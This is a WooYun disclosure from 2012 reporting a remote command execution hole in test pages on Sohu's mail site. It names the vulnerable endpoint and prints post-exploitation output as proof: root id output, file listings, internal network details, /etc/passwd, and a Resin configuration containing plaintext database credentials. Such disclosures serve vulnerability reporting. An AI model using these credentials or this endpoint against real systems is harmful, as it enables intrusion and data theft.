乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2012-09-07: 细节已通知厂商并且等待厂商处理中 2012-09-07: 厂商已经确认,细节仅向厂商公开 2012-09-17: 细节向核心白帽子及相关领域专家公开 2012-09-27: 细节向普通白帽子公开 2012-10-07: 细节向实习白帽子公开 2012-10-22: 细节向公众公开
http://mail.sohu.com/部分目录下测试页面存在任意命令执行漏洞。
http://mail.sohu.com/mapp/vote/addComment.action
jdbc:mysql://192.168.95.xx:3306/mail_app?user=mail&password=mail_@pp!?&useUnicode=true&characterEncoding=GBKuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)/usr/local/resin3/conf/resin.conf/usr/local/src/activity/web/manage.jsp/usr/local/src/mail_help/web/manage.jsp/usr/local/src/mail_help.201105201733/web/manage.jsp/usr/local/src/mail_help_0108/web/manage.jsp/usr/local/src/my_mail_help/web/manage.jsp/usr/local/resin3/doc/activity/manage.jsp/usr/local/resin3/doc/mail_help/manage.jsp/usr/local/resin3/doc/mail_help_12/manage.jsp/usr/local/resin3/doc/mail_help_11/manage.jsp/usr/local/resin3/doc/activity_20090916/manage.jsp/usr/local/resin3/doc/mail_help-1/manage.jsp/usr/local/resin3/doc/mail_help-1/mail_help_bak/manage.jsp/usr/local/resin3/doc/mail_help_0108/manage.jsp/opt/jy/rsync_log/mail_csm/web/vote/login.jsp/opt/jy/rsync_log/mail_csm/web/login.jsp/opt/zyh/file/resin-pro-4.0.0/doc/resin-doc/examples/security-basic/login.jsp/usr/local/src/test_mail_csm/web/vote/login.jsp/usr/local/src/test_mail_csm/web/login.jsp/usr/local/src/score_web/web/login.jsp/usr/local/src/score_web.200912141638/web/login.jsp/usr/local/src/passport/web/partner/login.jsp/usr/local/src/passport/web/sso/login.jsp/usr/local/src/passport/web/login.jsp/usr/local/src/mailRecommend/web/login.jsp/usr/local/src/mail_help/web/activity/newyear/login.jsp/usr/local/src/mail_help.201105201733/web/activity/newyear/login.jsp/usr/local/src/score_admin/web/login.jsp/usr/local/src/mail_csm/web/vote/login.jsp/usr/local/src/mail_csm/web/login.jsp/usr/local/src/mail_csm.201204101604/web/vote/login.jsp/usr/local/src/mail_csm.201204101604/web/login.jsp/usr/local/src/my_mail_help/web/activity/newyear/login.jsp/usr/local/resin3/webapps/resin-doc/examples/security-basic/login.jsp/usr/local/resin3/doc/score/login.jsp/usr/local/resin3/doc/score_web/login.jsp/usr/local/resin3/doc/mailRecommend/login.jsp/usr/local/resin3/doc/mail_help/activity/newyear/login.jsp/usr/local/resin3/doc/mail_csm/vote/login.jsp/usr/local/resin3/doc/mail_csm/login.jsp/usr/local/src/activity/web/help/mail/help1.jsp/usr/local/src/activity/help/mail/help1.jsp/usr/local/src/passport/web/help/help1.jsp/usr/local/src/mail_help/web/help/mail/help1.jsp/usr/local/src/mail_help.201105201733/web/help/mail/help1.jsp/usr/local/src/mail_help_0108/web/help/mail/help1.jsp/usr/local/src/my_mail_help/web/help/mail/help1.jsp/usr/local/resin3/doc/activity/help/mail/sogou/help1.jsp/usr/local/resin3/doc/activity/help/mail/chinaren/help1.jsp/usr/local/resin3/doc/activity/help/mail/help1.jsp/usr/local/resin3/doc/mail_help/help/mail/help1.jsp/usr/local/resin3/doc/mail_help_12/help/mail/help1.jsp/usr/local/resin3/doc/mail_help_11/help/mail/help1.jsp/usr/local/resin3/doc/activity_20090916/help/mail/help1.jsp/usr/local/resin3/doc/mail_help-1/help/mail/help1.jsp/usr/local/resin3/doc/mail_help-1/mail_help_bak/help/mail/help1.jsp/usr/local/resin3/doc/mail_help_0108/help/mail/help1.jsp/usr/local/src/mail_help/web/help/mail/dream/help_udiskkehu.jsp/usr/local/src/mail_help.201105201733/web/help/mail/dream/help_udiskkehu.jsp/usr/local/resin3/doc/mail_help/help/mail/dream/help_udiskkehu.jsp/opt/log/score/score.log/opt/log/resinlog/log4j/activity.log/opt/log/resinlog/vipmail_log4j.log/opt/work/address_new_vip/log/6940.log/opt/work/address_new_vip/log/6942.log/opt/work/address_new_vip/log/6941.log/opt/work/address_new_vip/log/6943.log/opt/work/address_new_enterprise/log/6952.log/opt/work/address_new_enterprise/log/6953.log/opt/work/address_new_enterprise/log/6950.log/opt/work/address_new_enterprise/log/6951.log/usr/local/resin3/log1/log4j/activity.log-rw-r--r-- 1 root root 12216 2011-09-15 app-default.xml-rw-r--r-- 1 root root 12216 2009-05-14 app-default.xml.orig-rw-r--r-- 1 root root 10413 2010-04-28 recommendreg_resin.conf-rw-r--r-- 1 root root 11253 4 19 12:08 resin.conf-rw-r--r-- 1 root root 11252 2010-01-30 resin.conf.bak-rw-r--r-- 1 root root 10119 2009-05-14 resin.conf.ori-rw-r--r-- 1 root root 9970 2009-05-14 resin.conf.orig-rw-r--r-- 1 root root 11277 4 19 12:08 resin_csm.conf-rw-r--r-- 1 root root 11275 4 10 14:32 resin_csm.conf.bak-rw-r--r-- 1 root root 11307 2010-04-20 test_csm_resin.confdrwxr-xr-x 2 root root 4096 2009-05-14 admindrwxr-xr-x 3 root root 4096 5 10 14:22 bindrwxr-xr-x 2 root root 4096 8 20 10:51 confdrwxr-xr-x 15 root root 4096 4 19 12:38 docdrwxr-xr-x 4 root root 4096 2009-05-14 ext-webapp-libdrwxr-xr-x 2 root root 4096 2009-12-11 libdrwxr-xr-x 2 root root 4096 2009-12-11 lib_backupdrwxr-xr-x 2 root root 4096 2009-05-14 libexec64lrwxrwxrwx 1 root root 18 2010-01-26 log -> /opt/log/resinlog/drwxr-xr-x 3 root root 4096 2010-01-26 log1drwxr-xr-x 2 root root 4096 2009-10-27 logsdrwxr-xr-x 4 root root 4096 2010-01-07 mailRecommenddrwxr-xr-x 4 root root 4096 2009-05-14 phpdrwxr-xr-x 4 root root 4096 2009-05-14 pluginsdrwxr-xr-x 4 root root 4096 2009-05-14 webappseth0 Link encap:Ethernet HWaddr 00:23:7D:35:C4:96 inet addr:192.168.95.26 Bcast:192.168.95.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:20730868738 errors:0 dropped:129089 overruns:0 frame:0 TX packets:24810410341 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:5684562052843 (5.1 TiB) TX bytes:5237783993708 (4.7 TiB) Interrupt:185 Memory:f8000000-f8012100 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:1019797259 errors:0 dropped:0 overruns:0 frame:0 TX packets:1019797259 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:1096004216925 (1020.7 GiB) TX bytes:1096004216925 (1020.7 GiB)root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinrpm:x:37:37::/var/lib/rpm:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinnetdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bashnscd:x:28:28:NSCD Daemon:/:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinpegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologinhtt:x:100:101:IIIMF Htt:/usr/lib64/im:/sbin/nologinpostfix:x:500:501::/home/postfix:/bin/bashgit:x:501:503::/home/git:/bin/bashmysql:x:502:504::/home/mysql:/bin/bashmemcached:x:503:505::/home/memcached:/bin/bashhpsmh:x:504:506::/opt/hp/hpsmh:/sbin/nologin<!-- - Resin 3.1 configuration file. --><resin xmlns="http://caucho.com/ns/resin" xmlns:resin="http://caucho.com/ns/resin/core"> <!-- adds all .jar files under the resin/lib directory --> <class-loader> <tree-loader path="${resin.home}/ext-lib"/> <tree-loader path="${resin.root}/ext-lib"/> <tree-loader path="${resin.home}/lib"/> <tree-loader path="${resin.root}/lib"/> </class-loader> <!-- - Management configuration - - Remote management requires at least one enabled admin user. --> <management path="${resin.root}/admin"> <user name="admin" password="password" disable="true"/> <resin:if test="${resin.professional}"> <deploy-service/> <jmx-service/> <log-service/> <xa-log-service/> </resin:if> </management> <!-- - Logging configuration for the JDK logging API. --> <log name="" level="info" path="stdout:" timestamp="[%H:%M:%S.%s] {%{thread}} "/> <!-- - 'info' for production - 'fine' or 'finer' for development and troubleshooting --> <logger name="com.caucho" level="info"/> <logger name="com.caucho.java" level="config"/> <logger name="com.caucho.loader" level="config"/> <!-- - For production sites, change dependency-check-interval to something - like 600s, so it only checks for updates every 10 minutes. --> <dependency-check-interval>2s</dependency-check-interval> <!-- - SMTP server for sending mail notifications --> <system-property mail.smtp.host="127.0.0.1"/> <system-property mail.smtp.port="25"/> <!-- - Sets the default character encoding to utf-8 - - <character-encoding>utf-8</character-encoding> --> <!-- - You can change the compiler to "javac", "eclipse" or "internal". --> <!--javac compiler="internal" args="-source 1.5"/--> <javac compiler="javac" /> <!-- Security providers. - <security-provider> - com.sun.net.ssl.internal.ssl.Provider - </security-provider> --> <!-- Uncomment to use Resin's XML implementations - - <system-property javax.xml.parsers.DocumentBuilderFactory - ="com.caucho.xml.parsers.XmlDocumentBuilderFactory"/> - <system-property javax.xml.parsers.SAXParserFactory - ="com.caucho.xml.parsers.XmlSAXParserFactory"/> --> <cluster id="app-tier"> <!-- sets the content root for the cluster, relative to server.root --> <root-directory>.</root-directory> <server-default> <!-- The http port --> <http address="*" port="8080"/> <!-- - SSL port configuration: - - <http address="*" port="8443"> - <openssl> - <certificate-file>keys/gryffindor.crt</certificate-file> - <certificate-key-file>keys/gryffindor.key</certificate-key-file> - <password>test123</password> - </openssl> - </http> --> <!-- - The JVM arguments --> <jvm-arg>-Xmx1024m</jvm-arg> <jvm-arg>-Xss1m</jvm-arg> <jvm-arg>-Xdebug</jvm-arg> <jvm-arg>-Dcom.sun.management.jmxremote</jvm-arg> <!-- - Uncomment to enable admin heap dumps - <jvm-arg>-agentlib:resin</jvm-arg> --> <!-- - arguments for the watchdog process --> <watchdog-jvm-arg>-Dcom.sun.management.jmxremote</watchdog-jvm-arg> <watchdog-port>6600</watchdog-port> <!-- - Configures the minimum free memory allowed before Resin - will force a restart. --> <memory-free-min>1M</memory-free-min> <!-- Maximum number of threads. --> <thread-max>256</thread-max> <!-- Configures the socket timeout --> <socket-timeout>65s</socket-timeout> <!-- Configures the keepalive --> <keepalive-max>128</keepalive-max> <keepalive-timeout>15s</keepalive-timeout> <!-- - If starting bin/resin as root on Unix, specify the user name - and group name for the web server user. - - <user-name>resin</user-name> - <group-name>resin</group-name> --> </server-default> <!-- define the servers in the cluster --> <server id="" address="127.0.0.1" port="6800"/> <!-- - Configures the persistent store for single-server or clustered - in Resin professional. --> <resin:if test="${resin.professional}"> <persistent-store type="cluster"> <init path="session"/> </persistent-store> </resin:if> <!-- - For security, use a different cookie for SSL sessions. - <ssl-session-cookie>SSL_JSESSIONID</ssl-session-cookie> --> <!-- - Enables the cache (available in Resin Professional) --> <resin:if test="${resin.professional}"> <cache path="cache" memory-size="64M"> <!-- Vary header rewriting for IE --> <rewrite-vary-as-private/> </cache> </resin:if> <!-- - Enables periodic checking of the server status and - check for deadlocks.. - - All servers can add <url>s to be checked. --> <resin:if test="${resin.professional}"> <ping> <!-- <url>http://localhost:8080/test-ping.jsp</url> --> </ping> </resin:if> <!-- - Defaults applied to each web-app. --> <web-app-default> <prologue> <!-- - Extension library for common jar files. The ext is safe - even for non-classloader aware jars. The loaded classes - will be loaded separately for each web-app, i.e. the class - itself will be distinct. --> <class-loader> <tree-loader path="${resin.root}/ext-webapp-lib"/> </class-loader> <!-- - Enable EL expressions in Servlet and Filter init-param --> <allow-servlet-el/> </prologue> <!-- - Sets timeout values for cacheable pages, e.g. static pages. --> <cache-mapping url-pattern="/" expires="5s"/> <cache-mapping url-pattern="*.gif" expires="60s"/> <cache-mapping url-pattern="*.jpg" expires="60s"/> <cache-mapping url-pattern="*.png" expires="60s"/> <!-- - for security, disable session URLs by default. --> <session-config> <enable-url-rewriting>false</enable-url-rewriting> </session-config> <!-- - For security, set the HttpOnly flag in cookies. - <cookie-http-only/> --> <!-- - Some JSP packages have incorrect .tld files. It's possible to - set validate-taglib-schema to false to work around these packages. --> <jsp> <validate-taglib-schema>true</validate-taglib-schema> <fast-jstl>true</fast-jstl> <fast-jsf>false</fast-jsf> </jsp> </web-app-default> <!-- includes the app-default for default web-app behavior --> <resin:import path="${resin.home}/conf/app-default.xml"/> <!-- - Sample database pool configuration - - The JDBC name is java:comp/env/jdbc/test <database> <jndi-name>jdbc/mysql</jndi-name> <driver type="org.gjt.mm.mysql.Driver"> <url>jdbc:mysql://localhost:3306/test</url> <user></user> <password></password> </driver> <prepared-statement-cache-size>8</prepared-statement-cache-size> <max-connections>20</max-connections> <max-idle-time>30s</max-idle-time> </database> --> <database> <jndi-name>jdbc/mail_app</jndi-name> <driver type="com.mysql.jdbc.Driver"> <url>jdbc:mysql://192.168.95.xxx:3306/mail_app?useServerPrepStmts=true&useUnicode=true&characterEncoding=utf8</url> <user>mail</user> <password>mail_@pp!?</password> </driver> <prepared-statement-cache-size>8</prepared-statement-cache-size> <max-connections>20</max-connections> <max-idle-time>30s</max-idle-time> </database> <database> <jndi-name>jdbc/mail_app_58</jndi-name> <driver type="com.mysql.jdbc.Driver"> <url>jdbc:mysql://192.168.95.xx:3307/mail_app?useServerPrepStmts=true&useUnicode=true&characterEncoding=gbk</url> <user>mailapp</user> <password>maiL@))?</password> </driver> <prepared-statement-cache-size>8</prepared-statement-cache-size> <max-connections>20</max-connections> <max-idle-time>30s</max-idle-time> </database> <!-- - Default host configuration applied to all virtual hosts. --> <host-default> <!-- - With another web server, like Apache, this can be commented out - because the web server will log this information. --> <!-- access-log path="logs/access.log" format='%h %l %u %t "%r" %s %b "%{Referer}i" "%{User-Agent}i"' rollover-period="1W"/ --> <!-- creates the webapps directory for .war expansion --> <web-app-deploy path="webapps"/> <!-- creates the deploy directory for .ear expansion --> <ear-deploy path="deploy"> <ear-default> <ejb-server> <config-directory>WEB-INF</config-directory> </ejb-server> </ear-default> </ear-deploy> <!-- creates the deploy directory for .rar expansion --> <resource-deploy path="deploy"/> </host-default> <!-- configures a deployment directory for virtual hosts --> <host-deploy path="hosts"> <host-default> <resin:import path="host.xml" optional="true"/> </host-default> </host-deploy> <!-- configures the default host, matching any host name --> <host id="" root-directory="."> <!-- - configures an explicit root web-app matching the - webapp's ROOT --> <stdout-log path='log/activity/stdout.log' rollover-period='1W' /> <stderr-log path='log/activity/stderr.log' rollover-period='1W' /> <web-app id="/" root-directory="doc/mail_help"/> <web-app id="/resin-admin" root-directory="${resin.home}/php/admin"> <!-- - Administration application /resin-admin --> <prologue> <resin:set var="resin_admin_external" value="false"/> <resin:set var="resin_admin_insecure" value="true"/> </prologue> </web-app> </host> </cluster> <!-- - Configuration for the web-tier/load-balancer --> <resin:if test="${resin.professional}"> <cluster id="web-tier"> <server-default> <!-- The http port --> <http address="*" port="9080"/> </server-default> <server id="web-a" address="127.0.0.1" port="6700"/> <cache path="cache" memory-size="64M"/> <host id=""> <web-app id="/"> <rewrite-dispatch> <load-balance regexp="" cluster="app-tier"/> </rewrite-dispatch> </web-app> </host> </cluster> </resin:if></resin>
已修复。
危害等级:高
漏洞Rank:15
确认时间:2012-09-07 10:46
thanks
暂无